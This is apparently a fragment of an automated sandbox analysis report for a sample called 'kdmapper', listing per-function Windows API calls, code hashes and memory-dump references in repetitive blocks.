                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                              • Opcode ID: 92c63df5e9b5e09542eed32183824896f6d0f3e43c51614b0355cd2194cbac61
                                                                                                                                                                                                              • Instruction ID: fedeba27c581d1e2c6305fc8f0aaba5e0e6254a4a74e5dd21d69d569cec9731b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92c63df5e9b5e09542eed32183824896f6d0f3e43c51614b0355cd2194cbac61
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF71C171500B849ECB25EB71C8559F7B7E9EF14301F44496EF2AB87241DA32AA84CF31
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DE8289
                                                                                                                                                                                                                • Part of subcall function 00DE13DC: __EH_prolog.LIBCMT ref: 00DE13E1
                                                                                                                                                                                                                • Part of subcall function 00DEA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00DEA598
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog$CloseFind
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2506663941-0
                                                                                                                                                                                                              • Opcode ID: e3272506984109b68e8fd378f1cbab31754f7a72535866ef3fd5d8cb8e00dbe4
                                                                                                                                                                                                              • Instruction ID: 741cd96568f3422243b9f3296552ff0d36a2377d58c7b24b07051fb5b12bbdd1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3272506984109b68e8fd378f1cbab31754f7a72535866ef3fd5d8cb8e00dbe4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4941B8719446989ADB20FBA1CC55AE9B7B8EF00304F4444EAE18EA7093EB715FC5DB70
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DE13E1
                                                                                                                                                                                                                • Part of subcall function 00DE5E37: __EH_prolog.LIBCMT ref: 00DE5E3C
                                                                                                                                                                                                                • Part of subcall function 00DECE40: __EH_prolog.LIBCMT ref: 00DECE45
                                                                                                                                                                                                                • Part of subcall function 00DEB505: __EH_prolog.LIBCMT ref: 00DEB50A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                              • Opcode ID: 3f8c8ebfd32e4f1b80792577057d1256a2877209a8987831663a1ded6330d581
                                                                                                                                                                                                              • Instruction ID: 7288ba1643f4d2db47b84c5cdee66d0a1b1b3c0a6859f67c85df05ee93d49870
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f8c8ebfd32e4f1b80792577057d1256a2877209a8987831663a1ded6330d581
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93413FB0905B809ED724DF798885AE6FBE5FF19310F504A2EE5FE83281C7316654CB20
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DE13E1
                                                                                                                                                                                                                • Part of subcall function 00DE5E37: __EH_prolog.LIBCMT ref: 00DE5E3C
                                                                                                                                                                                                                • Part of subcall function 00DECE40: __EH_prolog.LIBCMT ref: 00DECE45
                                                                                                                                                                                                                • Part of subcall function 00DEB505: __EH_prolog.LIBCMT ref: 00DEB50A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                              • Opcode ID: 9579ca3712917b7aaf3ced0179b26c1ab03be40e81a833eae1297e7b0f53796b
                                                                                                                                                                                                              • Instruction ID: c17c1e1876679779720c53aa6569b9d356d2ed0745d769bf76c2a40795705ae6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9579ca3712917b7aaf3ced0179b26c1ab03be40e81a833eae1297e7b0f53796b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97413DB0905B809ED724DF798885AE6FBE5FF19310F504A2ED5FE83281C7316654CB20
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DFB098
                                                                                                                                                                                                                • Part of subcall function 00DE13DC: __EH_prolog.LIBCMT ref: 00DE13E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                              • Opcode ID: d41012c598f324e1d55ca37b317f876eae42a6cdc911c5e227a199a6b8f3d60f
                                                                                                                                                                                                              • Instruction ID: 90e861aa1d2e47a5927c88e86dec2cd4601707f1c9f6119b5b5273a2cfb7a532
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d41012c598f324e1d55ca37b317f876eae42a6cdc911c5e227a199a6b8f3d60f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41316A759002499ACB15EF65C851AFEBBB4AF09300F14849EE409B7282D735AE04CBB1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00E13A34), ref: 00E0ACF8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 190572456-0
                                                                                                                                                                                                              • Opcode ID: 7e1bfbf6747d668a0e700905078da3d5f38deb00518c10449969f816d4e15b49
                                                                                                                                                                                                              • Instruction ID: 3e73f02fafaf2311f2604f345dcbffe51f13642f8dfd6e914452d35c51b75a27
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e1bfbf6747d668a0e700905078da3d5f38deb00518c10449969f816d4e15b49
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6711A733A007296FEB259E29DC8099AB396AB8436871F9131FD55BB2D4D630DC8187D2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DECE45
                                                                                                                                                                                                                • Part of subcall function 00DE5E37: __EH_prolog.LIBCMT ref: 00DE5E3C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                              • Opcode ID: 2d81e1268f5eaaa3b3fd6fad6edbd430522fd2a96e8492f403523569a65d1096
                                                                                                                                                                                                              • Instruction ID: 7ddc513029abdecaabd29851b6d4fd7a4f0a6efd7a409ebc2da7ada0ad6f73a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d81e1268f5eaaa3b3fd6fad6edbd430522fd2a96e8492f403523569a65d1096
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD11A0B1A002849EEB14EB7AD545BAEBBE8DF84300F14445EF446D3282DB749E01CB72
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                              • Opcode ID: 4f31931049b83aeb8186271291dd36f0e4c42d1c341e5c073fce8b11e371a467
                                                                                                                                                                                                              • Instruction ID: ceb720864ddfecfcd29edb0dfd43979fc940db7a6481b606612ba8f5cfafc716
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f31931049b83aeb8186271291dd36f0e4c42d1c341e5c073fce8b11e371a467
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2201A5339015A8ABCF11BBA9CC919DEB736FF88750F054115F916B7112DA348D00C6B4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00E03C3F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 190572456-0
                                                                                                                                                                                                              • Opcode ID: d78eb6bf0902d066c15d12ac8a5386935e2063c275d3c71f57b184a29f783cd5
                                                                                                                                                                                                              • Instruction ID: 26764941165e5221c3b1641e6ce32d0a385fafc1a56c02c5e2e37715afd34816
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d78eb6bf0902d066c15d12ac8a5386935e2063c275d3c71f57b184a29f783cd5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24F0EC362002169FDF118E79EC4099AB7DDEF05B657145124FA05F71D0DB31DAA0C7A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E0CA2C,00000000,?,00E06CBE,?,00000008,?,00E091E0,?,?,?), ref: 00E08E38
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 40389e3e667316f43176bc0f070e15f1ee2c15f801593e1b92259063de58bd0a
                                                                                                                                                                                                              • Instruction ID: b4946403f752bf7b7696fb0ff8087753fa3c3444d91e84ed7d059c5d2bc0531f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40389e3e667316f43176bc0f070e15f1ee2c15f801593e1b92259063de58bd0a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EE0ED312022255AEA712A22DE04B9B7698DB523B8F123121BCC8B60D2CF20CC8282E5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DE5AC2
                                                                                                                                                                                                                • Part of subcall function 00DEB505: __EH_prolog.LIBCMT ref: 00DEB50A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                              • Opcode ID: 270775ea2aea1cb159cd7fd71b57e3cec399ff69f143d5b1c25afebbe85fa7b6
                                                                                                                                                                                                              • Instruction ID: 5a5f062105d06cdaf01621ce87344e1e494808b9b7ec4613cc1e6752ee43df43
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 270775ea2aea1cb159cd7fd71b57e3cec399ff69f143d5b1c25afebbe85fa7b6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C018C308106D8DAD725E7B8C0517EDFBA8DF64304F51848EA55AA3383CBB42B08D7B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DEA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA6C4
                                                                                                                                                                                                                • Part of subcall function 00DEA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA6F2
                                                                                                                                                                                                                • Part of subcall function 00DEA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA6FE
                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00DEA598
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1464966427-0
                                                                                                                                                                                                              • Opcode ID: 38b34a651f7e439cca196eff193a1048828a31fcc7320da007f2096d3d12ac91
                                                                                                                                                                                                              • Instruction ID: e2d3bbfbf0c0e3b1eefee61210e4fca51763ddd2a9a182a2933e8e329751e1a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38b34a651f7e439cca196eff193a1048828a31fcc7320da007f2096d3d12ac91
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAF082310087D1AACB227BB98904BCB7BD0AF1A331F158A4DF1FD62196C27560989B33
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00DF0E3D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExecutionStateThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2211380416-0
                                                                                                                                                                                                              • Opcode ID: bdcca9f05651c44d731ce41fb895ae6b8b60bbafcf2b6272ee982a27bc4f02f3
                                                                                                                                                                                                              • Instruction ID: 451a4042d8c291281bb429641b056d5812fcf3e0ec75681244b3304eb09223bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdcca9f05651c44d731ce41fb895ae6b8b60bbafcf2b6272ee982a27bc4f02f3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFD0C210A01098DADB22332A2819BFE2E0ACFE7710F0E40A5B64967183CA444886A271
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00DFA62C
                                                                                                                                                                                                                • Part of subcall function 00DFA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00DFA3DA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1915507550-0
                                                                                                                                                                                                              • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                                                              • Instruction ID: 13b3177c5e697f0051426fe81149653ffccb00dc5a5ca993e46ae22f45ad1817
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24D0C7B521060DB6DF416B658C12A7E7A95EB40340F05C125BE49D5151EAB1DA109572
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DloadProtectSection.DELAYIMP ref: 00DFE5E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
